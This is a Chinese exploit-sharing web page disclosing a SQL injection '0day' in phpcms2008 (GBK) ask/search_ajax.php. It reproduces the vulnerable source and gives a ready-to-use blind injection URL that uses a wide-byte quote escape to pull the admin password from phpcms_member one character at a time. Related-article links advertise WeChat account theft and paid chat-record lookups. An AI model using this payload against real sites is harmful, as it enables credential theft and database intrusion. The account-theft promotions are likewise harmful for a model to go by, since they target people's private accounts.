phpcms2008-0day ask/search_ajax.php
受影响程序: phpcms2008 gbk
漏洞文件:ask/search_ajax.php
code:
<?php
require './include/common.inc.php';
require_once MOD_ROOT.'include/ask.class.php';
$ask = new ask();
header('Content-type: text/html; charset=utf-8');
if(strtolower(CHARSET) != 'utf-8') $q = iconv(CHARSET, 'utf-8', $q);
if($q)
{
$where = " title LIKE '%$q%' AND status = 5";
}
else
{
exit('null');
}
$infos = $ask->listinfo($where, 'askid DESC', '', 10);
foreach($infos as $key=>$val)
{
$val['title'] = str_replace($q, '<span class="3865-e914-4411-4b16 c_orange">'.$q.'</span>', $val['title']);
$info[$key]['title'] = CHARSET != 'utf-8' ? iconv(CHARSET, 'utf-8', $val['title']) : $val['title'];
$info[$key]['url'] = $val['url'];
}
echo(json_encode($info));
?>
测试 *** :
ask/search_ajax.php?q=s%E6'/**/or/**/(select ascii(substring(password,1,1))/**/from/**/phpcms_member/**/where/**/username=0x706870636D73)>52%23
相关文章
黑客教你3分钟盗微信(黑客盗微信号的教程)
中关村在线消息,美高梅国际酒店集团表示,在2019年的一次黑客攻击中,最初他们认为影响了1060万客人,现在相信已经涉及超过1.42亿人。 美高梅酒店信息泄露 现在,暗网上出现了一则广告,...
铁总否认 那暗网超400万12306用户数据是从哪泄露的?_俄亥俄州
12 月 28 日,Freebuf 称,“圈内又在传一张疑似12306泄露数据暗交易的图,春运抢票高峰还没到,黑产分子就已经出手了”。据称,这份数据包括 60 万账户信息,详细到除了ID、手机号、...
微信单删后如何找回
单删是指单方面删除好友。而这种单方面删除的话,对方的微信好友列表依然会拥有你的一个好友,对方依然可以看到你的朋友圈状态,依然可以观察到你的日常状况以及你的昵称还有信息以及头像,只要是他不给你发任何...
抖音如何举报别人发的视频?
我们刷抖音的时候总会看到一些比较不喜欢的视频,这些视频可能都是一些不符合其原则的视频。但是不得不说这一款APP的风向还是很不错的,是很适合年轻人的软件,它可以让拍视频的人和看视频的人都能享受到一定...
恢复苹果微信聊天记录怎么恢复?恢复苹果微信聊天记录的方法
恢复苹果微信聊天记录怎么恢复?恢复苹果微信聊天记录的方法,有人说,微信交流正在让人情味降温。 其实,每一个看似冷酷的文字背后,也都可能有一份人情。 它的神奇之处在于,无论你身处世界何方、与他人相距...
600元查微信记录_600元查微信聊天记录
微信是每天都在使用的,也是一个人在一天之中用的最多的一个通讯工具,那么微信聊天记录里边儿储存的秘密也是很多的。当然如果被清空了之后,那么如何来查询这些微信聊天记录呢?1.如何恢复微信聊天记录。如果是已...
Copyright Your WebSite.Some Rights Reserved.
免责声明:本站所发布的任何网站,全部来源于互联网,版权争议与本站无关。仅供技术交流,如有侵权或不合适,请联系本人进行删除。不允许做任何非法用途!